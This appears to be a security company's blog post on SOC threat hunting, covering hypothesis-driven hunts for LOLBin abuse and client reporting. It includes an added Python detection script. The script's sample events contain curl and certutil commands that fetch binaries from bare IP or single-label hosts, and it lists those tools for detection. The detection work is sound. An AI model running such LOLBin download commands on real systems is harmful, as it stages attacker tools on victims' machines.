Cyber security & Networking
3 minutes reading

How threat hunting reduces business risks by uncovering hidden attacks

In a modern SOC, threat hunting is not just a nice to have, it is a cornerstone of resilience. By digging into data sources on a recurring basis, hidden attacks come to light faster, incident response becomes sharper, and overall risk is reduced. It is about moving from reacting to threats to actively staying ahead of them.

Raphaël Lheureux

October 08, 2025

In a previous article, we covered threat intelligence: the collection and analysis of data to understand the threat actors that pose cybersecurity risks to your organization. On an operational level, this involves detecting threats by matching Indicators of Compromise (IoCs) and Tactics, Techniques, and Procedures (TTPs) with data sourced from SIEM (Security Information and Event Management) platforms and XDR products.

Configuring a fully automated system that strikes a fine balance between detection rate and false positives is a formidable challenge. For instance, it is well known that certain malware is downloaded and installed on workstations by abusing trusted, pre-installed system tools such as Curl or Certutil (so-called LOLBins, Living Off The Land Binaries). However, because these tools have many legitimate uses, for example in update mechanisms, detecting every download made with them and flagging it for scrutiny by our SOC analysts would overload them with false positives.

That’s why, on a tactical level, the Cegeka Modern SOC also performs recurring threat hunting. A senior CSIRT analyst then manually examines relevant, advanced and/or novel TTPs to uncover hidden attacks. So, how does this process work at Cegeka?

From threat intelligence to hands-on hunting 

Our CSIRT analysts closely follow cybersecurity trends and understand their clients’ risk profiles, including the relevant threat actors they may face. Threat modeling, the process of identifying potential attackers, their goals, and the techniques they might use to compromise systems, helps analysts prioritize which threats to focus on. For example, an analyst might notice a trend involving the use of LOLBins like Curl to download malware, or the rise of Eastern European ransomware groups. This modeling informs the hypotheses they explore during threat hunting. 

Drawing on this threat intelligence, the CSIRT analyst formulates several hypotheses, such as “Eastern European ransomware groups may be downloading attacker tools onto compromised machines using LOLBins.” This hypothesis is then translated into specific threat hunts, such as “The use of Curl for downloading from servers without a fully qualified domain name.” 

Each hunt is then converted into precise hunting queries for EDR (Endpoint Detection and Response), XDR (Extended Detection and Response), and SIEM (Security Information and Event Management) products. These queries are executed across the systems of all our clients. We also run queries on network monitoring tools, for instance, in relation to data transfers to servers without a fully qualified domain name. 

What threat hunting reveals  

Every hunt leads to one of three scenarios: we uncover something suspicious, we lack sufficient data, or we find no noteworthy results. 

  • Suspicious findings 
    We identify something suspicious that indicates a security incident. Of course, we address this issue with urgency.
  • Missing data 
    We are unable to execute a hunting query due to the absence of a specific data source, such as network data, on the client’s end. We inform the client that we couldn’t perform our threat hunt and kindly ask them to implement the necessary data source if they want to benefit from these threat hunts in the future. 
  • No findings 
    Upon completing our hunting query across all required data sources, nothing suspicious is found. This scenario (luckily) accounts for the majority of cases. 
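As an added illustration (not Cegeka's own hunting query or tooling), the hunt "use of Curl for downloading from servers without a fully qualified domain name" expressed as a check over constructed process-creation events, together with the mapping of a hunt's result onto the three outcomes listed above. The event fields, the LOLBin list and the sample events are assumptions made for this example.

```python
import ipaddress
import re

# Hunt hypothesis under test (assumed for this example): a LOLBin such as
# curl or certutil fetching from a server that has no fully qualified domain name.
LOLBINS = {"curl.exe", "curl", "certutil.exe", "certutil"}
URL_RE = re.compile(r"(?:https?|ftp)://([^/\s:\"']+)", re.IGNORECASE)

# Constructed sample of process-creation events; not real telemetry.
SAMPLE_EVENTS = [
    {"host": "ws01", "image": "C:\\Windows\\System32\\curl.exe",
     "cmdline": "curl.exe -o C:\\Users\\Public\\a.bin http://10.0.0.5/a.bin"},
    {"host": "ws02", "image": "C:\\Windows\\System32\\curl.exe",
     "cmdline": "curl.exe -sL https://updates.example.com/patch.msi -o patch.msi"},
    {"host": "ws03", "image": "C:\\Windows\\System32\\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://files/tool.exe tool.exe"},
    {"host": "ws04", "image": "C:\\Windows\\System32\\notepad.exe",
     "cmdline": "notepad.exe http://127.0.0.1/readme.txt"},
]


def host_is_fqdn(host: str) -> bool:
    """True for a dotted DNS name; False for an IP literal or a single-label name."""
    try:
        ipaddress.ip_address(host.strip("[]"))
        return False  # IP literal, not a domain name at all
    except ValueError:
        pass
    return "." in host.strip(".")


def hunt_lolbin_downloads(events):
    """Return the events in which a LOLBin downloads from a non-FQDN server."""
    findings = []
    for ev in events:
        image = ev["image"].rsplit("\\", 1)[-1].lower()
        if image not in LOLBINS:
            continue  # not one of the binaries this hunt is about
        for match in URL_RE.finditer(ev["cmdline"]):
            if not host_is_fqdn(match.group(1)):
                findings.append({**ev, "target": match.group(1)})
    return findings


def hunt_outcome(events):
    """Map a hunt to the three outcomes: missing data, suspicious findings, no findings."""
    if events is None:
        return "missing data"  # the required data source is absent on the client's side
    return "suspicious findings" if hunt_lolbin_downloads(events) else "no findings"
```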

Turning threat hunting results into actionable insights 

The results of our hunts provide insights that we compile into a report for our clients: 

  • Context of the hunt 
    We explain what was hunted and the rationale behind it: the threat intelligence that informed our hypothesis and the precise threat hunts it was translated into. For example, we might explain that our client’s profile is frequently targeted by ransomware groups using LOLBins for malicious tool transfers, hence our focus on these specific TTPs. 
  • Information about the hunt 
    We provide comprehensive details regarding the hunt, including the TTPs we queried for (referenced by their MITRE ATT&CK Technique ID). Any detected vulnerabilities are accompanied by their CVE (Common Vulnerabilities and Exposures) identifiers for additional reference. 
  • Results of the hunt 
    We outline the hunt’s findings for each technology we used (EDR, XDR, SIEM). 

Our SOC clients can also access these insights via the Cegeka Security Observability dashboard. This allows them to assess their risks and make informed decisions to improve their security posture based on concrete data from our threat hunts. For example, if our reports indicate they lack certain data sources, they may choose to invest in deploying these data sources to get the full benefit of our threat hunts. 

Reducing business risks through threat hunting 

By actively performing threat hunting and combining it with threat intelligence, newsletters, and ongoing threat research, organizations gain the insights needed to uncover hidden attacks and respond effectively to the latest cyber threats. It is this proactive approach that helps stay one step ahead in an ever-evolving threat landscape. 

Threat hunting is part of our Cegeka Modern SOC services by default. On the one hand, it allows us to detect advanced techniques for which continuous monitoring rules would overload SOC analysts with false positives; on the other hand, it is a genuine compensating control for attacks that might have slipped through the net because they are so novel or advanced.
